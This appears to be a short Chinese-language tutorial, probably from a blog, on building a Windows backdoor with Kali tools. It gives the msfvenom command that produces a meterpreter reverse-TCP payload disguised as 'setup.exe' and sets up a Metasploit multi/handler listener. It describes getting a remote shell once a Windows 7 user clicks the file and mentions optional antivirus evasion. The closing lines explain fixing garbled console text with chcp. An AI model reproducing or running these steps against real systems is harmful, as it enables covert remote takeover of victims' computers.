首先在kali上制作一个后门程序,文件名为:setup.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=5050 -f exe -o setup.exe
#本地监听地址及端口号:192.168.1.100:5050
为生成的文件 setup.exe 赋予可执行的权限,如果有必要可以对该文件执行免杀命令。
chmod 777 setup.exe
再打开msfconsole,使用下面的模块:
use exploit/multi/handler
设置本地IP:
set LHOST 192.168.1.100
设置监听端口:
set LPORT 5050
进行渗透:
exploit
在Win 7上点击该setup.exe后,会自动获取Meterperter会话
输入shell,获取命令行
输入dir,获取目录
发现这些都有乱码,不能忍啊。。使用命令:
chcp 65001
注:CHCP是一个计算机指令,能够显示或设置活动代码页编号。
代码页 描述:
- 65001 UTF-8代码页
- 950 繁体中文
- 936 简体中文默认的GBK
- 437 MS-DOS美国英语
再用dir查看,中文显示正常